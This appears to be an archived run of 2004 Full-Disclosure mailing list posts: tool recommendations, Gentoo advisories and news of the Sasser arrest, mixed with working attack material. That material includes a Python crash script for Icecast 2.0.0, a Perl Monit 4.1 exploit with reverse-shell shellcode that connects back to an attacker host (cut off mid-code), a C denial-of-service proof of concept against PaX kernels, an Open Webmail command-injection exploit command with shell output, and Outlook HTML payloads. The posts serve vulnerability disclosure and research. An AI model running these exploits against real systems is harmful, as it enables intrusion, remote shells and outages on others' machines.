Re: [Full-Disclosure] Registry Watcher
On Sat, 8 May 2004 18:00:57 -0500 RandallM [EMAIL PROTECTED] wrote: Any programs out there that watches changes to registry and can give an alert? Registry Prot and Autostart Viewer from DiamondCS Freeware http://www.diamondcs.com.au/index.php?page=products RegRun 3 Security Suite http://www.greatis.com/regrun3.htm System Safety Monitor http://maxcomputing.narod.ru/indexe.html?lang=en (slow link) -robert ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Registry Watcher
Aditya, ALD [Aditya Lalit Deshmukh] wrote: the common installation inserts and all programs have values that must be inserted. If a watcher would have a data base to follow and any odd or uncommon entries could be flagged. As far as I know all newly found viruses insert registry entries and these could be placed in a data base that would cause registry to deny and flag. viruses generally attack registry first because most of the application including os use registry for running properly.. so registry is the favorite target. but a virus can do much harm without changing registry also. hey for this sort of thing i use a program called as proport, it watches all the autostart up registry entries and alerts u when any new program is added to it. this program sits in the system tray so it is not obstrusive download it from www.tudpage.com u dont want regmon but proport for this sort of thing -aditya I think it's supposed to be www.tdupage.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [Full-Disclosure] Registry Watcher
Greetings, Personally if you are running with least privilege then simply make the registry read-only ACL's can be applied to the registry too you know. I've worked with a couple of companies where we have made everything but the necessary HKCU keys read-only. This stops rogue installs and even ActiveX controls as well as general fiddling that some users try to do. I'd recommend the following reading. http://support.microsoft.com/default.aspx?scid=kb;en-us;246261 http://www.microsoft.com/technet/prodtechnol/winntas/tips/winntmag/inreg.msp x http://www.microsoft.com/security/guidance/topics/DesktopSecurity.mspx Then there are the tools mentioned but I prefer to plan first and stick with stuff that Microsoft has a responsibility to fix. Alan Melia Melmac Solutions Ltd. http://www.melmac.co.uk -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Steve Menard Sent: 09 May 2004 12:48 To: Full Disclosure List Subject: Re: [Full-Disclosure] Registry Watcher Aditya, ALD [Aditya Lalit Deshmukh] wrote: the common installation inserts and all programs have values that must be inserted. If a watcher would have a data base to follow and any odd or uncommon entries could be flagged. As far as I know all newly found viruses insert registry entries and these could be placed in a data base that would cause registry to deny and flag. viruses generally attack registry first because most of the application including os use registry for running properly.. so registry is the favorite target. but a virus can do much harm without changing registry also. hey for this sort of thing i use a program called as proport, it watches all the autostart up registry entries and alerts u when any new program is added to it. this program sits in the system tray so it is not obstrusive download it from www.tudpage.com u dont want regmon but proport for this sort of thing -aditya I think it's supposed to be www.tdupage.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Icecast 2.0.0 preauth overflow
There exists a remotely exploitable heap overflow in Icecast 2.0.0. The bug exists in the handling of base64 Authorization request. This bug was found in about 40 seconds during a HTTP audit of the web component of Icecast with the fuzzer SMUDGE (http://felinemenace.org/~nd/SMUDGE/) People complained that the last Icecast bugs weren't preauth. This one is. Attached is a simple python script to reproduce the bug on the Windows platform. Our tests confirmed that some tweaking will crash linux version although this was not verified by the Icecast team. Vendor == notified. On another note tis signifies the first release from the UBC. thanks, nd. -- http://felinemenace.org/~nd # will crash windows IceCast 2.0.0 # [EMAIL PROTECTED], 2004 import socket req = GET /admin/ HTTP/1.0\r\n req += Connection: Keep-Alive\r\n req += User-Agent: Mozilla/4.76 [en] (X11; U; Linux 2.4.2-2 i686)\r\n req += Host: 169.254.165.132:8000\r\n req += Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\n req += Accept-Encoding: gzip\r\n req += Accept-Language: en\r\n req += Accept-Charset: iso-8859-1,*,utf-8\r\n req += Authorization: Basic + (%0a * 3000) s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((127.0.0.1,8000)) s.send(req)
Re: [Full-Disclosure] Victory day - Sasser surrenders
Microsoft Reward Program Helps Lead to Information Resulting in Arrest Related to Sasser Internet Worm http://www.microsoft.com/presspass/press/2004/may04/05-08SasserTelePR.asp - Original Message - From: Aditya, ALD [Aditya Lalit Deshmukh] [EMAIL PROTECTED] To: Poof [EMAIL PROTECTED]; [EMAIL PROTECTED] Sent: Sunday, May 09, 2004 7:05 AM Subject: RE: [Full-Disclosure] Victory day - Sasser surrenders You're kidding there, right? no the person who made the statement below actually oversaw all the details of the transfer! . ~ And a few months ago, a large amount of money was transfered to his account from a couple of popular antivirus vendors :) Delivered using the Free Personal Edition of Mailtraq (www.mailtraq.com) ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html 1pxt.gif
RE: [Full-Disclosure] Victory day - Sasser surrenders
-2 doublepost -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Geoff Shively Sent: zaterdag 8 mei 2004 20:28 To: Feher Tamas; [EMAIL PROTECTED] Subject: RE: [Full-Disclosure] Victory day - Sasser surrenders HANOVER, Germany (Reuters) - A tip from reward-seekers and information from Microsoft led to the arrest of an 18-year-old suspected of creating the Sasser computer worm, German police and the software giant said on Saturday. Spokesman Frank Federau for Lower Saxony police said police were certain they had the man behind one of the Internet's most costly outbreaks of sabotage. http://www.reuters.com/newsArticle.jhtml?type=internetNewsstoryID=5080701 Cheers, Geoff Shively PivX Solutions, Inc. Stock Symbol: (OCTBB:DRIL.OB) -Original Message- From: Feher Tamas [mailto:[EMAIL PROTECTED] Sent: Sat 5/8/2004 4:32 AM To: [EMAIL PROTECTED] Cc: Subject: [Full-Disclosure] Victory day - Sasser surrenders http://news.bbc.co.uk/1/hi/world/europe/3695857.stm Alleged Sasser LSASS worm creator J. Sven (probably the same teenager who wrote some of the later Netsky variants) was arrested by police in the northern german town of Rotenburg. Rumor says it was the CIA or FBI who tracked him. Sincerely: Tamas Feher, Hungary. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] List Charter
[Full-Disclosure] Mailing List Charter John Cartwright [EMAIL PROTECTED] and Len Rose [EMAIL PROTECTED] Introduction Purpose -- This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.netsys.com. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by Len Rose and John Cartwright. Subscription Information Subscription/unsubscription may be performed via the HTTP interface located at http://lists.netsys.com/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to [EMAIL PROTECTED], send the word 'help' in either the message subject or body for details. Moderation Management --- The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.netsys.com/pipermail/full-disclosure/ Acceptable Content -- Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. Posting Guidelines -- The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing [EMAIL PROTECTED] Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. Charter Additions/Changes - The list charter will be published at http://lists.netsys.com/full-disclosure-charter.html In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200405-01 ] Multiple format string vulnerabilities in neon 0.24.4 and earlier
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200405-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Multiple format string vulnerabilities in neon 0.24.4 and earlier Date: May 09, 2004 Bugs: #48448 ID: 200405-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis There are multiple format string vulnerabilities in libneon which may allow a malicious WebDAV server to execute arbitrary code. Background == neon provides an HTTP and WebDAV client library. Affected packages = --- Package/ Vulnerable / Unaffected --- 1 net-misc/neon = 0.24.4 = 0.24.5 Description === There are multiple format string vulnerabilities in libneon which may allow a malicious WebDAV server to execute arbitrary code under the context of the process using libneon. Impact == An attacker may be able to execute arbitrary code under the context of the process using libneon. Workaround == A workaround is not currently known for this issue. All users are advised to upgrade to the latest version of the affected package. Resolution == Neon users should upgrade to version 0.24.5 or later: # emerge sync # emerge -pv =net-misc/neon-0.24.5 # emerge =net-misc/neon-0.24.5 References == [ 1 ] CVE http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0179 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200405-01.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 pgp0.pgp Description: PGP signature
[Full-Disclosure] [ GLSA 200405-02 ] Multiple vulnerabilities in LHa
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200405-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Multiple vulnerabilities in LHa Date: May 09, 2004 Bugs: #49961 ID: 200405-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Two stack-based buffer overflows and two directory traversal problems have been found in LHa. These vulnerabilities can be used to execute arbitrary code or as a denial of service attack. Background == LHa is a console-based program for packing and unpacking LHarc archives. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-arch/lha = 114i-r1 = 114i-r2 Description === Ulf Harnhammar found two stack overflows and two directory traversal vulnerabilities in LHa version 1.14 and 1.17. A stack overflow occurs when testing or extracting archives containing long file or directory names. Furthermore, LHa doesn't contain sufficient protection against relative or absolute archive paths. Impact == The stack overflows can be exploited to execute arbitrary code with the rights of the user testing or extracting the archive. The directory traversal vulnerabilities can be used to overwrite files in the filesystem with the rights of the user extracting the archive, potentially leading to denial of service or privilege escalation. Since LHa is often interfaced to other software like an email virus scanner, this attack can be used remotely. Workaround == There is no known workaround at this time. All users are advised to upgrade to the latest available version of LHa. Resolution == All users of LHa should upgrade to the latest stable version: # emerge sync # emerge -pv =app-arch/lha-114i-r2 # emerge =app-arch/lha-114i-r2 References == [ 1 ] CAN-2004-0234 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0234 [ 2 ] CAN-2004-0235 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0235 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200405-02.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2004 Gentoo Technologies, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/1.0 -BEGIN PGP SIGNATURE- Version: GnuPG v1.2.4 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFAnmwwvcL1obalX08RAoGgAJ0bmbmcu7FGXVwnbTLu84nXf4Rv8ACfQvhj MxOL9Q4B9as0zJ3/L6yFNVY= =AcdX -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Registry Watcher
RandallM [EMAIL PROTECTED] writes: Hi, Any programs out there that watches changes to registry and can give an alert? RegMon from sysinternals.com. There are a whole load of useful Windows tools at that site. cheers, Jamie -- James Riden / [EMAIL PROTECTED] / Systems Security Engineer Information Technology Services, Massey University, NZ. GPG public key available at: http://www.massey.ac.nz/~jriden/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Policy measurement and compliance tools
Fellows Looking for tools that measure security policy in an organizations The only one I know is symentec enterprise security manager (ESM) Any others?? Thanks in advance!! -n ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Monit 4.1 remote shell exploit (HTTP)
Here's an oldie for a simple buffer overflow vuln.
Read more here: http://www.securityfocus.com/bid/9099/discussion/
If I've been correctly informed, the public exploit out there
only DoSes (I haven't tested it, so I really can't say). Anyway,
this one's an over-hacked reverse shellcode variant...
discard it in any degree you like.
// Michel, http://www.cycom.se
#!/usr/bin/perl
#
# Monit 4.1 (possibly earlier too) remote shell exploit (HTTP)
# (C) 2004 by Shadowinteger [EMAIL PROTECTED]
#
# Verbatim copying, distribution and/or modification of this
# code is permitted without restriction.
#
# THIS SOFTWARE IS PROVIDED AS IS, WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# You may have to install Math::XOR for this to run, e.g.:
# $ perl -MCPAN -e install Math::XOR
#
# Acknowledgments: Sabu, Nullbyte
#
use POSIX;
use Getopt::Std;
use IO::Socket::INET;
use Math::XOR;
use strict;
sub usage {
print usage: sploit [-a 0xbf7ff9e4] [-o 250] target_host [port]\n .
-a address ret address to make eip\n .
-o offsetoffset to subtract from address before injecting it\n .
-c hostname choose hostname to have the shellcode connect back to,
default\n .
is localhost\n .
-p port choose port to have the shellcode connect back to, default
is\n .
31337.\n .
-B use x86 *BSD shellcode instead of x86 Linux\n .
The default address is 0xbf7ff9e4 and the default offset to subtract from
that\n .
address is 250, this works under Slackware 8.1 with default ./configure\n .
compilation options. You may have to do some research for your system, gdb
is\n .
your friend, e.g. \gdb process pid_of_monit_httpd\.\n;
exit 1;
}
# pre_shellcode was added to make sure the stack doesn't write into our
# shellcode
my $pre_shellcode = \x83\xC4\x40; # add esp, byte 0x40
my $linux_shellcode = # shadowinteger's reverse shellcode (sishell, x86 linux)
\xeb\x74\x5d\x6a\x06\x6a\x01\x6a\x02\x8d\x1c\x24\x89\xd9\x31\xdb .
\xb3\x01\x31\xc0\xb0\x66\xcd\x80\x89\xc7\x83\xec\x08\x31\xc9\xc6 .
\x04\x24\x02\x88\x4c\x24\x01\xb8\x80\xff\xff\xfe\x35\xff\xff\xff .
\xff\x66\xc7\x44\x24\x02\x7a\x69\x89\x44\x24\x04\x8d\x04\x24\x83 .
\xec\x10\x89\x3c\x24\x89\x44\x24\x04\x31\xc0\xb0\x10\x89\x44\x24 .
\x08\x31\xc0\xb0\x66\x31\xdb\xb3\x03\x8d\x14\x24\x89\xd1\xcd\x80 .
\x85\xc0\x78\x3c\x31\xc9\x31\xc0\xb0\x3f\x89\xfb\xcd\x80\x41\x80 .
\xf9\x02\x77\x04\xeb\xf0\xeb\x2f\x83\xec\x10\x8d\x44\x24\x08\x89 .
\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x88\x5d\x07\x89 .
\xeb\x8d\x14\x24\x89\xd1\x31\xd2\x31\xc0\xb0\x0e\x2c\x03\xcd\x80 .
\x31\xc0\x89\xc3\x40\xcd\x80\xe8\x56\xff\xff\xff\x2f\x62\x69\x6e .
\x2f\x73\x68\x24;
my $lin_IP_OFFSET = 40;
my $lin_PORT_OFFSET = 54;
my $lin_XOR = 0x; # number to xor the ip address with
my $bsd_shellcode = # shadowinteger's reverse shellcode (sishell, x86 bsd)
\xeb\x55\x5d\x6a\x06\x6a\x01\x6a\x02\x31\xc0\xb0\x61\x50\xcd\x80 .
\x89\xc7\x83\xec\x08\x31\xc9\xc6\x04\x24\x02\x88\x4c\x24\x01\xb8 .
\x80\xff\xff\xfe\x35\xff\xff\xff\xff\x66\xc7\x44\x24\x02\x7a\x69 .
\x89\x44\x24\x04\x8d\x04\x24\x6a\x10\x50\x57\x31\xc0\xb0\x62\x50 .
\xcd\x80\x72\x3b\x31\xc9\x51\x57\x31\xc0\xb0\x5a\x50\xcd\x80\x41 .
\x80\xf9\x02\x77\x04\xeb\xef\xeb\x2e\x83\xec\x10\x8d\x44\x24\x08 .
\x89\x04\x24\x31\xdb\x89\x5c\x24\x04\x89\x5c\x24\x08\x8d\x14\x24 .
\x89\xd1\x53\x51\x88\x5d\x07\x55\x31\xc0\xb0\x3b\x50\xcd\x80\x31 .
\xc0\x50\xfe\xc0\x50\xcd\x80\xe8\x76\xff\xff\xff\x2f\x62\x69\x6e .
\x2f\x73\x68\x24;
my $bsd_IP_OFFSET = 32;
my $bsd_PORT_OFFSET = 46;
my $bsd_XOR = 0x;
# just define these here, since we're strict
my $shellcode;
my $IP_OFFSET;
my $PORT_OFFSET;
my $XOR;
# set up defaults
my $offset = 250; # offset to back-track (subtract) from $address
my $address = 0xbf7ff9e4;
my $target = localhost;
my $port = 2812;
my $callback_host = localhost;
my $callback_port = pack('n', 31337);
# handle options
my %options = ();
getopts(a:o:c:p:Bh, \%options);
if ( defined $options{h} ) {
usage();
}
if ( ! $ARGV[0]) {
usage();
} else {
if ( length($ARGV[0]) 0 ) {
$target = $ARGV[0];
}
}
if ( $ARGV[1]) {
$port = $ARGV[1];
}
# if -B option is present, define $bsd
my $bsd = yes if defined $options{B};
if ( defined $options{a} ) {
$address = hex($options{a});
}
if ( defined $options{o} ) {
$offset = $options{o};
}
if ( defined $options{c} ) {
if ( length($options{c}) 0 ) {
$callback_host = $options{c};
}
}
if ( defined
[Full-Disclosure] PaX DoS proof-of-concept
/*
PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept
by Shadowinteger [EMAIL PROTECTED]
2004-05-04
Written after reading the security advisory posted by borg (ChrisR-) on
Bugtraq 2004-05-03 (my time). ChrisR - www.cr-secure.net
Acknowledgments: sabu (www.sabu.net)
Vulnerability:
PaX code for 2.6.x prior to 2004-05-01 in arch_get_unmapped_area()
(function in mm/mmap.c) is vulnerable to a local Denial of Service attack
because of a bug that puts the kernel into an infinite loop.
Read the security advisory for more info:
http://www.securityfocus.com/archive/1/361968/2004-04-30/2004-05-06/0
Exploitation:
We need to get passed the following line of code in
arch_get_unmapped_area() to succeed with a DoS:
if (TASK_SIZE - len addr) { ...
We do it like this:
TASK_SIZE - TYPICAL_ADDR + SINK = DOSVAL
DOSVAL is the value we'll use.
arch_get_unmapped_area() does the following:
if TASK_SIZE-DOSVAL TYPICAL_ADDR then... run right into the vuln code.
(TASK_SIZE-DOSVAL) *must* be less than TYPICAL_ADDR to succeed.
A DOSVAL of e.g. 0x8000 or above will work most times, no real need
for the funky calculation above.
There are quite a few functions available that are front-ends to
arch_get_unmapped_area(). This exploit uses good-old mmap().
Tiny DoS PoC:
#include sys/types.h
#include sys/stat.h
#include fcntl.h
#include unistd.h
#include sys/mman.h
int main(void){int
fd=open(/dev/zero,O_RDONLY);mmap(0,0xa000,PROT_READ,MAP_PRIVATE,fd,0);}
*/
#include sys/types.h
#include sys/stat.h
#include fcntl.h
#include unistd.h
#include sys/mman.h
#include stdio.h
#define TASK_SIZE 0xc000
#define TYPICAL_ADDR 0x43882000
#define SINK 0x0400
#define DOSVAL (TASK_SIZE - TYPICAL_ADDR + SINK)
int main() {
int fd = open(/dev/zero, O_RDONLY);
printf(PaX w/ CONFIG_PAX_RANDMMAP for Linux 2.6.x DoS proof-of-concept\n
by Shadowinteger [EMAIL PROTECTED] 20040504\n
created after a sec advisory on bugtraq posted by borg (ChrisR-)
20040503\n
ChrisR - www.cr-secure.net\n
\n
the exploit binary must be marked PF_PAX_RANDMMAP to work!\n
\n
greetz goes to: sabu (www.sabu.net)\n
\n
--\n
will exec \mmap(0, 0x%x, PROT_READ, MAP_PRIVATE, fd, 0);\\n
\n
if you run Linux 2.6.x-PaX or -grsec, this may \hurt\ your CPU(s) a
little,\n
are you sure you want to continue? [type Y to continue] , DOSVAL);
fflush(stdout);
if (getchar() != 'Y') {
printf(aborted.\n);
return 0;
}
printf(\n
attempting to DoS...\n);
if (mmap(0, DOSVAL, PROT_READ, MAP_PRIVATE, fd, 0) == MAP_FAILED) {
perror(mmap);
}
printf(your kernel does not seem to be vulnerable! :)\n);
return 0;
}
--
Michel Blomgren
Cycom AB
http://www.cycom.se
__
PGP: http://www.cycom.se/misc/pubkeymichel.asc
886A 7B17 1747 6C82 7A7E
EAC0 A3F1 2943 101C 18FA
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] OUTLOOK 2003: OuchLook
Sunday, May 09, 2004 Outlook 2003 the premier mail client from the company called 'Microsoft' certainly appears to have a lot of security features built into it. Curosry examination shows excellent thought into 'spam' containment, 'security' consideration and many other little 'things'. However there is a fundamental flaw with this particular device. That is, it copies our arbitrary file with given name into a known and easily reachable location: img src=malware.htm style=display:none when embedded into the body of a mail message and when the recipient replies, will copy itself into temp folder: C:\Documents and Settings\user name\Local Settings\Temp\malware.htm This location can be quite easily reached without having to know the user name [courtesy of jelmer]: a href=shell:user profile\\local settings\\temp\\malware.htmhttp://office.microsoft.com//a The scenario is 'painstakingly' trivial. Send your co-hort at the office an email that requires a reply. Embed in it, an html file out of sight. Either send them a second message with any number of 'spoofed' url schemes pointing to the file in the temp, or, direct them to a web site which will reach in into the temp folder via the same url and install and run our malicious software. Very Silly Design Error. End Call -- http://www.malware.com ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] CSA-200402-1: Previous Open Webmail vulnerability is exploitable
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Cycom AB Security Advisory CSA-200402-1
www.cycom.se
Advisory: Previous Open Webmail vulnerability is exploitable
Date: Sat Feb 21 15:18:21 CET 2004,
updated: Thu May 6 10:37:29 CEST 2004
Application: Open Webmail 2.20, 2.21 and 2.30 (and -current)
Vulnerability: Remote arbitrary command exection
Availability: http://openwebmail.org
Platforms: OS independent (multiple *NIXes)
Status: Patch is available (included in this advisory)
Reference: CSA-200402-1
Author: Michel Blomgren [EMAIL PROTECTED]
SYNOPSIS
Open WebMail is a webmail system based on the Neomail version 1.14
from Ernie Miller. Open WebMail is designed to manage very large mail
folder files in a memory efficient way. It also provides a range of
features to help users migrate smoothly from Microsoft Outlook to
Open WebMail.
-- http://openwebmail.org
VULNERABILITY
Nullbyte and Syscalls discovered that a near obsolete script named
userstat.pl shipped with Open Webmail 2.20, 2.21 and 2.30 doesn't
filter out dangerous *nix shell characters from the loginname
parameter. The loginname parameter is used as an argument when
executing openwebmail-tool.pl from the vulnerable script. By adding a
;, | or ( ) followed by the shell command to a http GET, HEAD
or POST request an attacker can execute arbitrary system commands as
an unprivileged user (the Apache user, nobody or www, e.g.).
DISCOVERY
The vulnerability was found by Nullbyte and Syscalls of UDC.
EXPLOIT
At least 2 exploits are in circulation, one by Nullbyte and one re-write by
Shadowinteger. Exploitation of openwebmail-current.tgz (2004-04-30 5.8MB) is
limited (read the FIX section below). You can use Gwee (generic web
exploitation engine) available from http://cycom.se/dl/gwee to exploit using
the following command:
$ gwee -L -y'loginname=%3B' -llocalhost -p31337
http://target/cgi-bin/openwebmail/userstat.pl
-L Use built-in TCP listener (like nc -l).
-l The host or IP address to have the reverse shellcode connect
back to.
-p The port to have the reverse shellcode connect back to.
For example...
$ gwee -y'loginname=%3B' -l localhost -p12345 -Lf localhost/userstat.cgi
!!!
` ___ '
- (0 0) -
- -oOo(_)oOo - --- -- - -
gwee 1.21 - generic web exploitation engine
Copyright (C) 2004 Michel Blomgren [EMAIL PROTECTED]
Perl and Python shellcode by Sabu [EMAIL PROTECTED]
Acknowledgements: Sabu and Nullbyte
[i] target: localhost
[i] using POST requests to send data
[i] shellcode: Sabu's reverse Perl shellcode (portable)
[i] injection method: perl -e
[+] resolving localhost into an ip address
[i] shellcode will connect to 127.0.0.1 on port 12345
[i] will listen for incoming connection on port 12345
[+] attempting to inject shellcode into target
[+] listening for incoming connection on port 12345, timeout is 30 seconds
[i] got connection from 127.0.0.1:33670
Linux luserland 2.4.22-openmosix-1 #1 Thu Mar 18 09:55:31 CET 2004 i686 unknown
12:05:52 up 3:56, 7 users, load average: 0.08, 0.02, 0.01
FIX
Cycom AB has provided a diff patch that will fix the issue. Ken Girrard
kgirrard.AT.users.sourceforge.net wrote and published an advisory long
before this one. He provided a patch with his advisory which results in
userstat.pl still being vulnerable to remote arbitrary command execution, this
patch is applied to (shipped with) openwebmail-current.tgz released 2004-04-30
(5.8MB).
Girrard's patch doesn't filter out | (pipes) and /, but does filter out
spaces and tabs, which makes it impossible to pass arguments to commands an
attacker would want to execute. Nevertheless, it's still possible to execute
commands without arguments. An example of such an attack would be an attacker
that has write access to the box using e.g. FTP and uploads a reverse
shellcode, marks it executable and enters the absolute path to it in a crafted
URL like this one for example:
http://target/cgi-bin/openwebmail/userstat.plloginname=%7C/home/fu/bar
Our patch follows...
- --snip--
- --- userstat.pl.orig2004-02-20 14:58:06.0 +0100
+++ userstat.pl 2004-02-21 18:05:16.0 +0100
@@ -52,6 +52,9 @@
my $html=qq|a href=_URL_ target=_blank style=text-decoration: none|.
qq|font color=_COLOR__TEXT_/font/a|;
+# filter out dangerous characters
+$user =~ s/[\/\\'\`\|\(\)\[\]\{\}\$\s;]//g;
+
if ($user ne ) {
my $status=`$ow_cgidir/openwebmail-tool.pl -m -e $user`;
if ($status =~ /has no mail/) {
- --snip--
Enter cgi-bin/openwebmail/ and run:
$ patch -i owm.patch
ACKNOWLEDGMENTS
I would like to thank the following people:
Sabu, Nullbyte and Syscalls.
ABOUT CYCOM AB
Cycom AB is a newly started firm specializing in information security
services (penetration testing, risk assessment, source code review,
disaster/incident management and
Re: [Full-Disclosure] KDE was hacked
If you had been subscribed to our iAlert services, you would have known about this specific hacker threat months in advance, and known that only the binary releases of KDE are safe to use. As an agent of an commercial intelligence agency, I cannot stress how important it is for all commercial entities to subscribe to commercial intelligence services. We know about hacking before it happens! On Fri, May 07, 2004 at 10:48:06PM +0400, Alexander wrote: 2004/05/03 13:50:28 KDE was hacked by Russian hacker More information (In Russian) http://www.securitylab.ru/45100.html Diff for /kdenetwork/kppp/connect.cpp between version 1.175 and 1.176: http://webcvs.kde.org/cgi-bin/cvsweb.cgi/kdenetwork/kppp/connect.cpp.diff?r1 =1.175r2=1.176f=h ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Richard Johnson, CISSP Senior Security Researcher iDEFENSE Inc. [EMAIL PROTECTED] Get paid for security stuff!! http://www.idefense.com/contributor.html and become part of our reearch team! http://idefense.bugtraq.org/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Windows IPS personal use
Guys, Looking for a intrusion prevention system for personal use on my win xp box Thanks in advance -Kartik ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] KDE was hacked
Aloha, Richard. I'm comfortable with I told you so. and have used it at times myself. There may be something wrong with I could have told you so, if you had paid me. Secrets for dollars will always exist, but shouldn't we just do it and shut up about it rather than try to make it seem like a reasonable business practice? We know about hacking before it happens! Then you are complicit and should be prosecuted. Sincerely, Jason Coombs [EMAIL PROTECTED] Richard Johnson wrote: If you had been subscribed to our iAlert services, you would have known about this specific hacker threat months in advance, and known that only the binary releases of KDE are safe to use. As an agent of an commercial intelligence agency, I cannot stress how important it is for all commercial entities to subscribe to commercial intelligence services. We know about hacking before it happens! ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] KDE was hacked
